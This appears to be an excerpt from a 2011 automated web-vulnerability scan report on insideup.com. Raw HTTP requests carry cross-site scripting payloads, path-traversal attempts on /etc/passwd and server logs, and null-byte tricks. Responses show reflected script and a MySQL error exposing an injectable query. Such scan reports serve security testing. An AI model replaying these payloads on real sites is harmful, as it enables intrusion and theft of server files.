Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=eecljvkm6b2sjqupdk3u0i1fr7; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>' OR prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>' OR prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>' OR prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>' OR prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>' OR prj.project_page_url = 'leadflow/lgds00/?'"--></style></script><script>netsparker(0x000599)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000599)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST '"--></style></script><script>alert(0x0005A3)</script>
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 286
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005A3)%3c%2fscript%3e&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:19 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=E02CEFC241169631815239EB57FE4867; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0005A3)</script>"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0005A3)</script>"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0005A3)&lt;/script&gt;'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <..
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005A5)</script>

Request

GET /ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005A5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
